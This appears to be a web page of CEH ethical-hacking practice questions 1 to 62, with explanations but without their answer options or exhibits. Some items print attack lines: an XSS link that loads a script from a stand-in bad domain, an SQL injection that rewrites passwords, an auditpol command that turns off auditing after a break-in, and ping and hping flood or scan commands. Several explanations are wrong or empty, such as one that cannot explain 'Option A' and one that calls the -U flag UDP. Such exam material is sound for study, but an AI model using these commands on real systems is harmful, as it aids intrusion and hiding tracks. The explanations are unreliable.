CEH Quiz (101-200) Take This Quiz

Reviewed by Editorial Team
The ProProfs editorial team is comprised of experienced subject matter experts. They've collectively created over 10,000 quizzes and lessons, serving over 100 million users. Our team includes in-house content moderators and subject matter experts, as well as a global network of rigorously trained contributors. All adhere to our comprehensive editorial guidelines, ensuring the delivery of high-quality content.
Learn about Our Editorial Process
| By Porterwb
P
Porterwb
Community Contributor
Quizzes Created: 2 | Total Attempts: 1,226
| Attempts: 738 | Questions: 100
Quiz Flashcard
Please wait...
Question 1 / 100
0 %
0/100
Score 0/100
1. Within the context of Computer Security, which of the following statements describes Social Engineering best?

Explanation

Social Engineering is the act of manipulating and deceiving individuals to gain access to sensitive information or systems, rather than using technical methods to breach security. It involves exploiting human psychology and trust to trick people into revealing confidential information or performing actions that may compromise security. This can be done through various techniques such as phishing, pretexting, or impersonation.

Submit
Please wait...
About This Quiz
CEH Quiz (101-200) Take This Quiz - Quiz

This CEH Quiz (101-200) assesses skills in cybersecurity, focusing on practical scenarios like footprinting, encryption, and attack detection. It's designed for professionals aiming to validate their ethical hacking... see moreexpertise. see less

2. How does a denial-of-service attack work?

Explanation

In a denial-of-service attack, a hacker intentionally disrupts the availability of a service by overwhelming it with a flood of illegitimate requests or by exploiting vulnerabilities in the system. This prevents legitimate users from accessing the service, causing it to become unavailable or slow down significantly. The hacker may use various techniques such as sending a large volume of traffic, exploiting software vulnerabilities, or conducting a distributed attack using multiple compromised devices. The goal is to exhaust the resources of the targeted service, making it unable to respond to legitimate requests.

Submit
3. John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?

Explanation

The destination MAC address of a broadcast frame is 0xFFFFFFFFFFFF. In Ethernet, a broadcast frame is sent to all devices on the network, so the destination MAC address is set to the broadcast address, which is represented by all Fs in hexadecimal notation.

Submit
4. This method is used to determine the Operating system and version running on a remote target system. What is it called?

Explanation

OS fingerprinting is a method used to determine the operating system and version running on a remote target system. This technique involves analyzing network packets or responses from the target system to identify specific characteristics or behaviors that are unique to different operating systems. By analyzing these fingerprints, security professionals can gain valuable information about the target system, which can be used for vulnerability assessment or penetration testing purposes.

Submit
5. William has received a Chess game from someone in his computer programming class through email. William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Chess. After William installs the game, he plays it for a couple of hours. The next day, William plays the Chess game again and notices that his machine has begun to slow down. He brings up his Task Manager and sees the following programs running:

Explanation

The correct answer is Remote Access Trojan (RAT). A RAT is a type of malware that allows an attacker to remotely control a victim's computer. In this scenario, William's computer has been infected with a RAT after installing the Chess game. This explains why his machine has started to slow down and why he sees the RAT program running in his Task Manager. The RAT is likely responsible for the decrease in performance and may also be compromising William's privacy and security by allowing the attacker to access and control his computer remotely.

Submit
6. You are footprinting an organization and gathering competitive intelligence. You visit the company's website for contact information and telephone numbers but do not find them listed there. You know they had the entire staff directory listed on their website 12 months ago but now it is not there. Is there any way you can retrieve information from a website that is outdated?

Explanation

The Archive.org website is known for its Wayback Machine feature, which allows users to view archived versions of websites from the past. By visiting the Archive.org website, you can access the Internet archive of the company's website and retrieve the information that was previously listed, including the staff directory and contact information. This can be a useful method to retrieve outdated information from a website that no longer has it listed.

Submit
7. While testing web applications, you attempt to insert the following test script into the search area on the company's web site:   <script>alert('Testing Testing Testing')</script>   Later, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here?

Explanation

The vulnerability detected in the web application in this scenario is Cross Site Scripting (XSS). This is evident from the fact that when the test script is inserted into the search area and the search button is pressed, a pop-up box appears on the screen with the text "Testing Testing Testing". This indicates that the web application is not properly sanitizing or validating user input, allowing the execution of malicious scripts.

Submit
8. What framework architecture is shown in this exhibit?

Explanation

The correct answer is Metasploit. Metasploit is a framework that provides information about security vulnerabilities and aids in penetration testing. It allows users to exploit vulnerabilities in systems and gain unauthorized access. The exhibit likely shows the architecture of the Metasploit framework, which includes various components and modules used for scanning, exploiting, and post-exploitation activities.

Submit
9. Yancey is a network security administrator for a large electric company. This company provides power for over 100,000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered?

Explanation

Yancey would be considered a Suicide Hacker because he is willing to face severe consequences, such as going to jail for 30 or more years, in order to take down the company that is downsizing and causing him to lose his job.

Submit
10. What is the correct order of steps in CEH System Hacking Cycle?

Explanation

The correct order of steps in the CEH System Hacking Cycle is Option A. However, without further information or context, it is not possible to provide a specific explanation for this answer.

Submit
11. You are the CIO for Avantes Finance International, a global finance company based in Geneva. You are responsible for network functions and logical security throughout the entire corporation. Your company has over 250 servers running Windows Server, 5000 workstations running Windows Vista, and 200 mobile users working from laptops on Windows 7.   Last week, 10 of your company's laptops were stolen from salesmen while at a conference in Amsterdam.  These laptops contained proprietary company information. While doing damage assessment on the possible public relations nightmare this may become, a news story leaks about the stolen laptops and also that sensitive information from those computers was posted to a blog online.   What built-in Windows feature could you have implemented to protect the sensitive information on these laptops?

Explanation

The correct answer suggests that implementing Encrypted File System (EFS) could have protected the sensitive information on the stolen laptops. EFS is a built-in Windows feature that allows users to encrypt individual files and folders, providing an additional layer of security. By encrypting the sensitive files on the laptops, even if the laptops are stolen, the information would remain encrypted and inaccessible to unauthorized users. This would help prevent the leakage of sensitive information in case of theft or unauthorized access to the laptops.

Submit
12. What type of attack is shown here?

Explanation

The correct answer is Distributed Denial of Service Attack. This type of attack involves multiple compromised computers, often spread across different locations, flooding a target system with an overwhelming amount of traffic or requests. This causes the target system to become unavailable to its intended users, resulting in a denial of service.

Submit
13. In which step does Steganography fits in CEH System Hacking Cycle (SHC)

Explanation

Steganography fits in Step 5: Hide files of the CEH System Hacking Cycle (SHC). Steganography is the technique of hiding secret information within an ordinary file or message to avoid detection. In this step, the attacker may use steganography to hide files or data within seemingly harmless files or images, making it difficult for security measures to detect the hidden information. This allows the attacker to maintain covert access to the compromised system without raising suspicion.

Submit
14. What type of session hijacking attack is shown in the exhibit?

Explanation

The correct answer is Session Sniffing Attack. In a session sniffing attack, an attacker intercepts and monitors network traffic to capture session information, such as session IDs or cookies. This allows the attacker to impersonate the user and gain unauthorized access to the user's account or sensitive information. The exhibit likely shows evidence of this type of attack being carried out.

Submit
15. You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability.   Which command will you run to disable auditing from the cmd?

Explanation

To disable auditing from the command prompt after gaining access to a victim's computer using the Windows 2003 Server SMB Vulnerability, the command that should be run is "auditpol.exe /disable". This command will disable auditing on the system, preventing any further logging or tracking of activities.

Submit
16. In which location, SAM hash passwords are stored in Windows 7?

Explanation

SAM hash passwords in Windows 7 are stored in the c:\windows\system32\config\SAM location.

Submit
17. What port number is used by LDAP protocol?

Explanation

The correct answer is 389. LDAP (Lightweight Directory Access Protocol) uses port number 389 for communication. LDAP is a protocol used for accessing and maintaining distributed directory information services over an IP network. Port number 389 is the default port assigned to LDAP, and it is used for both clear text and secure communication.

Submit
18. In this type of Man-in-the-Middle attack, packets and authentication tokens are captured using a sniffer. Once the relevant information is extracted, the tokens are placed back on the network to gain access.

Explanation

In a Token Injection Replay attack, the attacker captures packets and authentication tokens using a sniffer. They then extract the relevant information and place the tokens back on the network to gain access. This allows the attacker to impersonate a legitimate user and bypass authentication measures.

Submit
19. Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces?  

Explanation

Snow is a steganography utility that exploits the nature of white space and allows the user to conceal information in these white spaces.

Submit
20. You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion?

Explanation

Steganography is a technique that allows you to hide data within other files, such as images. By concealing the Sales.xls database within a file like photo.jpg, you can send it out in an innocent-looking email or file transfer without raising suspicion. This method allows you to bypass the company's network security restrictions and monitoring systems, as the data appears to be a harmless image file.

Submit
21. John is using a special tool on his Linux platform that has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI/ASPX scripts. Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool?  

Explanation

Nessus is the correct answer because it is a popular and widely used vulnerability scanning tool for Linux platforms. It has a comprehensive database of signatures that can detect various vulnerabilities in UNIX, Windows, and commonly used web CGI/ASPX scripts. Additionally, Nessus is capable of detecting DDoS zombies and Trojans, making it a versatile tool for security professionals.

Submit
22. Identify SQL injection attack from the HTTP requests shown below:

Explanation

The given HTTP request is an example of a SQL injection attack. In this attack, the attacker is attempting to manipulate the SQL query by adding additional SQL statements within the input parameter "lname". The injected SQL statement is "update usertable set passwd='hAx0r'--", which aims to update the "passwd" field in the "usertable" table. This type of attack can allow unauthorized access to the database and potentially compromise sensitive information.

Submit
23. Study the snort rule given below and interpret the rule.   alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)

Explanation

The given snort rule is designed to generate an alert when a TCP packet is observed on the network originating from any IP address and destined for any IP address on the 192.168.1.0 subnet on port 111. The content parameter in the rule specifies the hexadecimal value "|00 01 86 a5|" that must be present in the packet payload for the rule to match. The msg parameter provides a descriptive message for the alert, indicating that it is related to "mountd access".

Submit
24. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.   <ahref="https://foobar.com/index.html?id=%3Cscript%20src=%22https://baddomain.com/badscript.js %22%3E% 3C/script%3E">See foobar</a>   What is this attack?

Explanation

This attack is a cross-site scripting (XSS) attack. It occurs when a website displays user-provided data without properly sanitizing it, allowing malicious scripts to be injected and executed on the user's browser. In this case, the provided code snippet includes a script tag with a source from a malicious domain, which can be used to carry out unauthorized actions on the user's behalf.

Submit
25. You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in foot printing the organization?

Explanation

By observing the job listings for network and system administrators, one can infer the specific operating systems, services, and applications that are being used by the organization. This information can be valuable for foot printing the organization as it provides insight into the technology infrastructure and potential vulnerabilities that may exist.

Submit
26. Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the Department of Defense's front end Exchange Server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password.   What tool would be best used to accomplish this?

Explanation

RainbowTables would be the best tool to accomplish this task because it already has the precomputed LM hashes for all possible permutations of the administrator password. This means that Johnny can quickly compare the LM hash of the target password with the precomputed hashes in the RainbowTables to find a match, significantly reducing the time required to crack the password.

Submit
27. The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow?

Explanation

Line 17 in the source code might lead to buffer overflow because the C++ functions at that line do not check bounds, which means that they do not verify if the data being written to the buffer exceeds its allocated size. This can result in writing data beyond the buffer's boundaries, causing a buffer overflow vulnerability.

Submit
28. _____________ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.

Explanation

A block cipher is a type of symmetric-key encryption algorithm that operates on fixed-length blocks of plaintext data. It transforms each block of plaintext into a block of ciphertext of the same length using a specific encryption algorithm and a secret key. Unlike stream ciphers that encrypt data bit by bit or byte by byte, block ciphers encrypt data in fixed-sized blocks, providing a higher level of security. The ciphertext produced by a block cipher is also of the same length as the plaintext, making it suitable for applications that require fixed-length data encryption.

Submit
29. Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction?

Explanation

The offenders are using HTTP tunneling software to bypass the content filtering system. This software allows them to communicate with protocols in a way that it was not intended, effectively bypassing any restrictions or filters in place. This allows them to access offensive websites during work hours without being detected by Neil's firewall rules and logs.

Submit
30. The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources. However, host A can continue to receive data as long as the SYN sequence numbers of transmitted packets from host B are lower than the packet segment containing the set FIN flag.  

Explanation

The explanation for the given correct answer is that the FIN flag is indeed set and sent from host A to host B when host A has no more data to transmit and wants to close the TCP connection. This flag is used to release the connection resources. However, even after sending the FIN flag, host A can still receive data as long as the SYN sequence numbers of the transmitted packets from host B are lower than the packet segment containing the set FIN flag. Therefore, the statement is true.

Submit
31. Jason is the network administrator of Spears Technology. He has enabled SNORT IDS to detect attacks going through his network. He receives Snort SMS alerts on his iPhone whenever there is an attempted intrusion to his network.   He receives the following SMS message during the weekend. An attacker Chew Siew sitting in Beijing, China had just launched a remote scan on Jason's network with the hping command.   Which of the following hping2 command is responsible for the above snort alert?

Explanation

The hping2 command responsible for the above snort alert is "hping -S -R -P -A -F -U 192.168.2.56 -p 22 -c 5 -t 118". This command includes various flags that indicate different types of TCP/IP packets being sent to the target IP address and port. The flags -S, -R, -P, -A, -F, and -U represent SYN, RST, PUSH, ACK, FIN, and UDP packets respectively. The fact that these flags are included in the command indicates that the attacker is attempting to perform a remote scan on Jason's network.

Submit
32. Charlie is the network administrator for his company. Charlie just received a new Cisco router and wants to test its capabilities out and to see if it might be susceptible to a DoS attack resulting in its locking up. The IP address of the Cisco switch is 172.16.0.45. What command can Charlie use to attempt this task?

Explanation

Charlie can use the command "ping -l 56550 172.16.0.45 -t" to attempt to test the capabilities of the new Cisco router and see if it is susceptible to a DoS attack resulting in its locking up.

Submit
33. "Testing the network using the same methodologies and tools employed by attackers" Identify the correct terminology that defines the above statement.

Explanation

Penetration testing refers to the process of assessing the security of a network by simulating real-world attacks. It involves using the same methodologies and tools employed by attackers to identify vulnerabilities and weaknesses in the network's defenses. This helps organizations understand their security posture and take necessary measures to strengthen their network security.

Submit
34. You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free Anti-Virus software.   Dear valued customers, We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware, viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code: Antivirus code: 5014 https://www.juggyboy/virus/virus.html Thank you for choosing us, the worldwide leader Antivirus solutions. Mike Robertson PDF Reader Support Copyright Antivirus 2010 ?All rights reserved If you want to stop receiving mail, please go to: https://www.juggyboy.com or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama How will you determine if this is Real Anti-Virus or Fake Anti-Virus website?

Explanation

The suggested explanation is that searching the URL and Anti-Virus product name into Google and looking out for suspicious warnings against the site is the best way to determine if the website is a real Anti-Virus or fake Anti-Virus website. This is because Google search results can often provide information and warnings from other users who may have encountered the website before and can indicate if it is trustworthy or not.

Submit
35. Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called?

Explanation

This document is called an Information Security Policy (ISP). It is a formal written document that outlines what employees are allowed to use the company's systems for, what is prohibited, and the consequences of breaking the rules. Two printed copies of the policy should be given to every employee, and they should sign one copy to acknowledge their acceptance of its terms. The signed copy should be filed by the company. The ISP ensures that employees are aware of the company's expectations regarding the use of its computer systems and helps maintain security and compliance.

Submit
36. When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack?

Explanation

An attacker would exploit this design by launching a TCP SYN attack by flooding TCP SYN packets with random source addresses towards a victim host. This flood of SYN packets overwhelms the connection queue on the victim host, causing it to fill up and preventing legitimate connections from being established. This is known as a SYN flood attack, and it can effectively deny service to the victim host by consuming its resources and causing it to become unresponsive.

Submit
37. A digital signature is simply a message that is encrypted with the public key instead of the private key.

Explanation

A digital signature is not simply a message that is encrypted with the public key instead of the private key. In fact, a digital signature is created by encrypting a hash value of the message with the sender's private key. The recipient can then use the sender's public key to decrypt the digital signature and verify the integrity and authenticity of the message.

Submit
38. Which definition below best describes a covert channel?

Explanation

A covert channel refers to the act of using a protocol in a manner that it was not originally designed or intended for. This involves exploiting the protocol's features or vulnerabilities to transmit information or perform actions that were not authorized or expected. By using a protocol in an unintended way, individuals can establish hidden communication channels or bypass security measures, making it a covert channel. This can be done to evade detection or gain unauthorized access to systems or information.

Submit
39. You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network.  You are confident that hackers will never be able to gain access to your network with complex security system in place. Your peer, Peter Smith who works at the same department disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of "weakest link" in the security chain. What is Peter Smith talking about?

Explanation

Peter Smith is referring to untrained staff or ignorant computer users as the weakest link in the security chain. Despite having advanced security technologies in place, these individuals can unknowingly compromise the network by falling victim to social engineering attacks, clicking on malicious links or attachments, or sharing sensitive information. Their lack of knowledge or awareness makes them vulnerable to hackers, bypassing the strong security measures implemented. This highlights the importance of educating and training employees to recognize and respond appropriately to potential security threats.

Submit
40. In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to this scam. Which of the following statement is incorrect related to this attack?

Explanation

The statement "Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks" is incorrect because while these software can help detect and prevent certain types of attacks, they may not be able to easily detect sophisticated phishing scams like the one described in the question. Phishing attacks often rely on social engineering tactics and can be designed to bypass security software. Therefore, relying solely on antivirus, anti-spyware, and firewall software is not enough to protect against such attacks.

Submit
41. How do you defend against MAC attacks on a switch?

Explanation

Enabling port security on a switch is an effective way to defend against MAC attacks. Port security allows the switch to restrict the number of MAC addresses that can be learned on a specific port. This prevents attackers from flooding the switch with fake MAC addresses or attempting to overload the switch's MAC address table. By limiting the number of MAC addresses, port security ensures that only trusted devices are allowed to connect to the network, thereby protecting against unauthorized access and MAC attacks.

Submit
42. What is the command used to create a binary log file using tcpdump?

Explanation

The command "tcpdump -w ./log" is used to create a binary log file using tcpdump. The "-w" option specifies the file name and location for the log file. In this case, the log file will be created in the current directory with the name "log".

Submit
43. Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to a proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What proxy tool has Gerald's attacker used to cover their tracks?

Explanation

The attacker has used a TOR proxy to cover their tracks. TOR (The Onion Router) is a network of servers that allows users to browse the internet anonymously by encrypting and routing their traffic through multiple nodes. By using a TOR proxy, the attacker can hide their true IP address and location, making it difficult for Gerald to trace back the source of the attack.

Submit
44. Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment.   Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it.   What kind of Denial of Service attack was best illustrated in the scenario above?

Explanation

The scenario described in the question involves Bob launching an attack that results in serious financial losses for Brownies Inc. The attack causes their main financial transaction server to crash, requiring human interaction to fix it and rendering the company's resources inaccessible. This aligns with the definition of a Denial of Service (DoS) attack, specifically one that involves crashing a network or system.

Submit
45. Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easy task for hackers. They use tools such as arhontus or brutus to break into remote servers. A command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously with a list of passwords and a single login name: linksys. Many FTP-specific password-guessing tools are also available from major security sites.   What defensive measures will you take to protect your network from these attacks?

Explanation

The correct answer is a combination of several defensive measures to protect the network from dictionary and brute force attacks. By never leaving a default password, the network eliminates the risk of hackers easily guessing the password. Additionally, by avoiding passwords that can be found in a dictionary and ones related to personal information such as hobbies, pets, relatives, or date of birth, the network increases the complexity of the password, making it harder to crack. Furthermore, using a password that is not related to the hostname, domain name, or any other information that can be found with whois adds another layer of security. By implementing these measures, the network reduces the vulnerability to dictionary and brute force attacks.

Submit
46. Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers.  

Explanation

When Basic Authentication is configured on web servers, data is sent over the network as clear text, meaning it is not encrypted. This means that anyone who intercepts the data can easily read and understand its contents. This lack of encryption can pose a security risk, as sensitive information such as passwords or personal data can be easily accessed by unauthorized individuals. Therefore, it is important to use additional security measures, such as SSL/TLS encryption, to protect data when Basic Authentication is used.

Submit
47. ViruXine.W32 virus hides their presence by changing the underlying executable code. This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. Here is a section of the Virus code: What is this technique called?

Explanation

The technique described in the given code is called a Polymorphic Virus. This type of virus hides its presence by continually changing its underlying executable code while keeping the original algorithm intact. Each time the virus runs, it mutates the code, but the function of the code remains the same. This allows the virus to evade detection by antivirus software that relies on signature-based detection methods.

Submit
48. What type of encryption does WPA2 use?

Explanation

WPA2 (Wi-Fi Protected Access 2) uses AES-CCMP (Advanced Encryption Standard - Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) with a key length of 128 bits. AES is a symmetric encryption algorithm widely used for securing sensitive data. CCMP is a cryptographic protocol that provides data confidentiality, integrity, and authentication. The combination of AES and CCMP ensures a high level of security for wireless networks.

Submit
49. Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL request?

Explanation

Bob should use the single quote character to attempt breaking a valid SQL request because it is commonly used in SQL injection attacks to manipulate the structure of the SQL query and potentially gain unauthorized access to the database. By injecting a single quote, Bob can test if the application is vulnerable to SQL injection by observing any error messages or unexpected behavior from the application.

Submit
50. Your company has blocked all the ports via external firewall and only allows port 80/443 to connect to the Internet. You want to use FTP to connect to some remote server on the Internet.   How would you accomplish this?

Explanation

HTTP Tunneling allows you to encapsulate FTP traffic within HTTP requests, which are allowed through the firewall via port 80/443. This enables you to bypass the port restrictions and establish an FTP connection to the remote server.

Submit
51. This is an example of whois record. Sometimes a company shares a little too much information on their organization through public domain records.  Based on the above whois record, what can an attacker do? (Select 2 answers)

Explanation

Based on the given whois record, an attacker can attempt phishing and social engineering on targeted individuals using the information from the whois record. This is because the whois record may contain personal contact information such as email addresses, which can be used to deceive individuals into revealing sensitive information. Additionally, spammers can send unsolicited emails to the addresses listed in the whois record, as they have access to this information.

Submit
52. When writing shellcodes, you must avoid ____________ because these will end the string.

Explanation

When writing shellcodes, null bytes must be avoided because they act as string terminators. This means that any characters or instructions after a null byte will not be processed or executed. Therefore, including null bytes in a shellcode can cause it to be truncated or rendered ineffective.

Submit
53. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?

Explanation

The given answer suggests that it will take an attacker only 5 minutes to crack a 22 character word password. This implies that the password is not strong enough and can be easily guessed or hacked using various methods such as brute force attacks or dictionary attacks. A strong password should ideally be longer and include a combination of uppercase and lowercase letters, numbers, and special characters to make it more secure and difficult to crack.

Submit
54. NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to intercept the traffic from a victim machine to a corporate network printer. You are attempting to hijack the printer network connection from your laptop by sniffing the wire. Which port does SMB over TCP/IP use?

Explanation

SMB (Server Message Block) over TCP/IP uses port 445. By sniffing the wire, the attacker can intercept the traffic between the victim machine and the corporate network printer. Port 445 is the correct answer because it is the port used by SMB, which is responsible for file and printer sharing over the network.

Submit
55. Which of the following Trojans would be considered 'Botnet Command Control Center'?

Explanation

Poison Ivy is considered a 'Botnet Command Control Center' because it is a remote administration tool (RAT) that allows an attacker to control compromised computers remotely. It provides full control over the infected machines, allowing the attacker to execute commands, steal information, and monitor activities. This makes Poison Ivy a powerful tool for managing a botnet, which is a network of compromised computers controlled by a central command center.

Submit
56. You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered.  A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next?

Explanation

Running a NULL TCP hping2 against 192.168.1.10 would be the next step because pings to the IP address are not being answered and a basic nmap scan is not returning any information. Running a NULL TCP hping2 scan can help determine if a packet filter is in front of 192.168.1.10 by sending TCP packets with no flags set and analyzing the response. This can help identify if the lack of response is due to a firewall or other filtering mechanism.

Submit
57. Lee is using Wireshark to log traffic on his network. He notices a number of packets being directed to an internal IP from an outside IP where the packets are ICMP and their size is around 65,536 bytes. What is Lee seeing here?

Explanation

Lee is seeing a Ping of death attack. This is indicated by the large size of the ICMP packets, which are around 65,536 bytes. A Ping of death attack involves sending oversized ICMP packets to a target's IP address, causing the target system to crash or become unresponsive.

Submit
58. Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords. Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To comply with the management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters.   Harold is concerned about having to accommodate the managers, but cannot do anything about it. Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6.   Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than the management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords.   Why did the 14 character passwords not take much longer to crack than the 8 character passwords?

Explanation

The reason why the 14 character passwords did not take much longer to crack than the 8 character passwords is because LanManager hashes, which are used in the original domain, are broken up into two 7 character fields. This means that even though the passwords are longer, they are still split into two parts, making it easier for password cracking software like John the Ripper to crack them. Therefore, the length of the password does not significantly increase the time it takes to crack it in this case.

Submit
59. LAN Manager Passwords are concatenated to 14 bytes, and split in half. The two halves are hashed individually. If the password is 7 characters or less, than the second half of the hash is always:

Explanation

The given answer, 0xAAD3B435B51404EE, is the second half of the hash when the password is 7 characters or less. This suggests that the password provided is 7 characters or less, and the second half of the hash is always the same for such passwords. The first half of the hash is not provided, but it can be assumed that it would be different for each password.

Submit
60. One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IP address.   You send a ping request to the broadcast address 192.168.5.255. There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not.  Why?

Explanation

Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. This is why only 13 hosts out of the 40 computers on the target network send a reply, while the others do not.

Submit
61. Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility is to ensure that all physical and logical aspects of the city's computer network are secure from all angles. Bill is an IT technician that works with Hampton in the same IT department. Bill's primary responsibility is to keep PC's and servers up to date and to keep track of all the agency laptops that the company owns and lends out to its employees. After Bill setup a wireless network for the agency, Hampton made sure that everything was secure.  He instituted encryption, rotating keys, turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only company laptops are allowed to use the wireless network, so Hampton entered all the MAC addresses for those laptops into the wireless security utility so that only those laptops should be able to access the wireless network.  Hampton does not keep track of all the laptops, but he is pretty certain that the agency only purchases Dell laptops. Hampton is curious about this because he notices Bill working on a Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions, Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba laptop instead of the usual Dell. Bill's boss said no, so now Hampton is very curious to see how Bill is accessing the Internet. Hampton does site surveys every couple of days, and has yet to see any outside wireless network signals inside the company's building.   How was Bill able to get Internet access without using an agency laptop?

Explanation

Bill was able to get Internet access without using an agency laptop because he spoofed the MAC address of a Dell laptop. This means that he changed the MAC address of his Toshiba laptop to match the MAC address of a Dell laptop that was allowed to access the wireless network. By doing this, Bill was able to bypass the MAC address filtering implemented by Hampton and gain unauthorized access to the network.

Submit
62. Switches maintain a CAM Table that maps individual MAC addresses on the network to physical ports on the switch.   In MAC flooding attack, a switch is fed with many Ethernet frames, each containing different source MAC addresses, by the attacker. Switches have a limited memory for mapping various MAC addresses to physical ports. What happens when the CAM table becomes full?

Explanation

When the CAM table becomes full, the switch is unable to map new MAC addresses to physical ports. As a result, it treats all incoming frames as unknown and broadcasts them to all machines on the network, effectively acting as a hub. This can lead to a security vulnerability as it allows an attacker to intercept and capture network traffic.

Submit
